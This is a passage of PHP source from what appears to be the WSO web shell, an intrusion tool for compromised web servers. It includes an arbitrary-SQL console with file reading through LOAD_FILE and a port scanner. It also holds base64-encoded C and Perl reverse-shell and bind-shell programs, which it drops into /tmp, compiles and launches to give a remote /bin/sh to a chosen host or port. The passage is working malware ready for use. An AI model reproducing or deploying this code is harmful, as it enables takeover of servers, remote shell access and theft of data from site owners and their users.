1349 <input type=hidden name=p2>
1350 <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd']);?>'>
1351 <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>
1352 <td>
1353 <select name='type'>
1354 <option value="mysql" <?php if(@$_POST['type']=='mysql')echo 'selected';?>>MySql</option>
1355 <option value="pgsql" <?php if(@$_POST['type']=='pgsql')echo 'selected';?>>PostgreSql</option>
1356 </select></td>
1357 <td><input type=text name=sql_host value='<?=(empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host']));?>'></td>
1358 <td><input type=text name=sql_login value='<?=(empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login']));?>'></td>
1359 <td><input type=text name=sql_pass value='<?=(empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass']));?>'></td>
1360 <td>
1361 <?php
1362 $tmp = "<input type=text name=sql_base value=''>";
1363 if(isset($_POST['sql_host'])){
1364 if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
1365 switch($_POST['charset']) {
1366 case "Windows-1251": $db->setCharset('cp1251'); break;
1367 case "UTF-8": $db->setCharset('utf8'); break;
1368 case "KOI8-R": $db->setCharset('koi8r'); break;
1369 case "KOI8-U": $db->setCharset('koi8u'); break;
1370 case "cp866": $db->setCharset('cp866'); break;
1371 }
1372 $db->listDbs();
1373 echo "<select name=sql_base><option value=''></option>";
1374 while($item = $db->fetch()) {
1375 list($key, $value) = each($item);
1376 echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';
1377 }
1378 echo '</select>';
1379 }
1380 else echo $tmp;
1381 }else
1382 echo $tmp;
1383 ?></td>
1384 <td><input type=submit value=">>"></td>
1385 </tr>
1386 </table>
1387 <script>
1388 function st(t,l) {
1389 document.sf.p1.value = 'select';
1390 document.sf.p2.value = t;
1391 if(l!=null)document.sf.p3.value = l;
1392 document.sf.submit();
1393 }
1394 function is() {
1395 for(i=0;i<document.sf.elements['tbl[]'].length;++i)
1396 document.sf.elements['tbl[]'][i].checked = !document.sf.elements['tbl[]'][i].checked;
1397 }
1398 </script>
1399 <?php
1400 if(isset($db) && $db->link){
1401 echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
1402 if(!empty($_POST['sql_base'])){
1403 $db->selectdb($_POST['sql_base']);
1404 echo "<tr><td width=1 style='border-top:2px solid #666;border-right:2px solid #666;'><span>Tables:</span><br><br>";
1405 $tbls_res = $db->listTables();
1406 while($item = $db->fetch($tbls_res)) {
1407 list($key, $value) = each($item);
1408 $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.''));
1409 $value = htmlspecialchars($value);
1410 echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'> <a href=# onclick=\"st('".$value."')\">".$value."</a> (".$n['n'].")</nobr><br>";
1411 }
1412 echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'></td><td style='border-top:2px solid #666;'>";
1413 if(@$_POST['p1'] == 'select') {
1414 $_POST['p1'] = 'query';
1415 $db->query('SELECT COUNT(*) as n FROM '.$_POST['p2'].'');
1416 $num = $db->fetch();
1417 $num = $num['n'];
1418 echo "<span>".$_POST['p2']."</span> ($num) ";
1419 for($i=0;$i<($num/30);$i++)
1420 if($i != (int)$_POST['p3'])
1421 echo "<a href='#' onclick='st(\"".$_POST['p2']."\", $i)'>",($i+1),"</a> ";
1422 else
1423 echo ($i+1)," ";
1424 if($_POST['type']=='pgsql')
1425 $_POST['p3'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30);
1426 else
1427 $_POST['p3'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30';
1428 echo "<br><br>";
1429 }
1430 if((@$_POST['p1'] == 'query') && !empty($_POST['p3'])) {
1431 $db->query(@$_POST['p3']);
1432 if($db->res !== false) {
1433 $title = false;
1434 echo '<table width=100% cellspacing=0 cellpadding=2 class=main>';
1435 $line = 1;
1436 while($item = $db->fetch()) {
1437 if(!$title) {
1438 echo '<tr>';
1439 foreach($item as $key => $value)
1440 echo '<th>'.$key.'</th>';
1441 reset($item);
1442 $title=true;
1443 echo '</tr><tr>';
1444 $line = 2;
1445 }
1446 echo '<tr class="l'.$line.'">';
1447 $line = $line==1?2:1;
1448 foreach($item as $key => $value) {
1449 if($value == null)
1450 echo '<td><i>null</i></td>';
1451 else
1452 echo '<td>'.nl2br(htmlspecialchars($value)).'</td>';
1453 }
1454 echo '</tr>';
1455 }
1456 echo '</table>';
1457 } else {
1458 echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
1459 }
1460 }
1461 echo "<br><textarea name='p3' style='width:100%;height:100px'>".@htmlspecialchars($_POST['p3'])."</textarea><br/><input type=submit value='Execute'>";
1462 echo "</td></tr>";
1463 }
1464 echo "</table></form><br/><form onsubmit='document.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>";
1465 if(@$_POST['p1'] == 'loadfile') {
1466 $db->query("SELECT LOAD_FILE('".addslashes($_POST['p2'])."') as file");
1467 $file = $db->fetch();
1468 echo '<pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
1469 }
1470 }
1471 echo '</div>';
1472 printFooter();
1473}
1474// Sql end -------------------------
1475// Network go --------------------
1476function actionNetwork() {
1477 printHeader();
1478 $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9";
1479 $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
1480 $bind_port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9";
1481 $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
1482 echo "<h1>Network tools</h1><div class=content>
1483 <form name='nfp' onSubmit='g(null,null,this.using.value,this.port.value,this.pass.value);return false;'>
1484 <span>Bind port to /bin/sh</span><br/>
1485 Port: <input type='text' name='port' value='31337'> Password: <input type='text' name='pass' value='wso'> Using: <select name='using'><option value='bpc'>C</option><option value='bpp'>Perl</option></select> <input type=submit value='>>'>
1486 </form>
1487 <form name='nfp' onSubmit='g(null,null,this.using.value,this.server.value,this.port.value);return false;'>
1488 <span>Back-connect to</span><br/>
1489 Server: <input type='text' name='server' value=". $_SERVER['REMOTE_ADDR'] ."> Port: <input type='text' name='port' value='31337'> Using: <select name='using'><option value='bcc'>C</option><option value='bcp'>Perl</option></select> <input type=submit value='>>'>
1490 </form><br>";
1491 if(isset($_POST['p1'])) {
1492 function cf($f,$t) {
1493 $w=@fopen($f,"w") or @function_exists('file_put_contents');
1494 if($w) {
1495 @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t));
1496 @fclose($w);
1497 }
1498 }
1499 if($_POST['p1'] == 'bpc') {
1500 cf("/tmp/bp.c",$bind_port_c);
1501 $out = ex("gcc -o /tmp/bp /tmp/bp.c");
1502 @unlink("/tmp/bp.c");
1503 $out .= ex("/tmp/bp ".$_POST['p2']." ".$_POST['p3']." &");
1504 echo "<pre class=ml1>$out".ex("ps aux | grep bp")."</pre>";
1505 }
1506 if($_POST['p1'] == 'bpp') {
1507 cf("/tmp/bp.pl",$bind_port_p);
1508 $out = ex(which("perl")." /tmp/bp.pl ".$_POST['p2']." &");
1509 echo "<pre class=ml1>$out".ex("ps aux | grep bp.pl")."</pre>";
1510 }
1511 if($_POST['p1'] == 'bcc') {
1512 cf("/tmp/bc.c",$back_connect_c);
1513 $out = ex("gcc -o /tmp/bc /tmp/bc.c");
1514 @unlink("/tmp/bc.c");
1515 $out .= ex("/tmp/bc ".$_POST['p2']." ".$_POST['p3']." &");
1516 echo "<pre class=ml1>$out".ex("ps aux | grep bc")."</pre>";
1517 }
1518 if($_POST['p1'] == 'bcp') {
1519 cf("/tmp/bc.pl",$back_connect_p);
1520 $out = ex(which("perl")." /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." &");
1521 echo "<pre class=ml1>$out".ex("ps aux | grep bc.pl")."</pre>";
1522 }
1523 }
1524 echo '</div>';
1525 printFooter();
1526}
1527// Network end --------------------
1528// Port Scanner go --------------------
1529function actionPortScanner() {
1530 printHeader();
1531 echo '<h1>Port Scanner</h1>';
1532 echo '<div class="content">';
1533 echo '<form action="" method="post">';
1534
1535 if(isset($_POST['host']) && is_numeric($_POST['end']) && is_numeric($_POST['start'])){
1536 $start = strip_tags($_POST['start']);
1537 $end = strip_tags($_POST['end']);
1538 $host = strip_tags($_POST['host']);
1539 for($i = $start; $i<=$end; $i++){
1540 $fp = @fsockopen($host, $i, $errno, $errstr, 3);
1541 if($fp){
1542 echo 'Port '.$i.' is <font color=lime>open</font><br>';
1543 }
1544 flush();
1545 }
1546 } else {
1547 echo '<br /><br /><center><input type="hidden" name="a" value="PortScanner"><input type="hidden" name=p1><input type="hidden" name="p2">
1548 <input type="hidden" name="c" value="'.htmlspecialchars($GLOBALS['cwd']).'">
1549 <input type="hidden" name="charset" value="'.(isset($_POST['charset'])?$_POST['charset']:'').'">
1550 Host: <input type="text" name="host" value="localhost"/><br /><br />
1551 Port start: <input type="text" name="start" value="0"/><br /><br />
1552 Port end:<input type="text" name="end" value="5000"/><br /><br />
1553 <input type="submit" value="Scan Ports" />
1554 </form></center><br /><br />';
1555 }
1556 echo '</div>';
1557 printFooter();
1558}
1559// Port Scanner end --------------------
1560if( empty($_POST['a']) )
1561 if(isset($default_action) && function_exists('action' . $default_action))
1562 $_POST['a'] = $default_action;
1563 else
1564 $_POST['a'] = 'FilesMan';
1565if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) )
1566 call_user_func('action' . $_POST['a']);
1567?>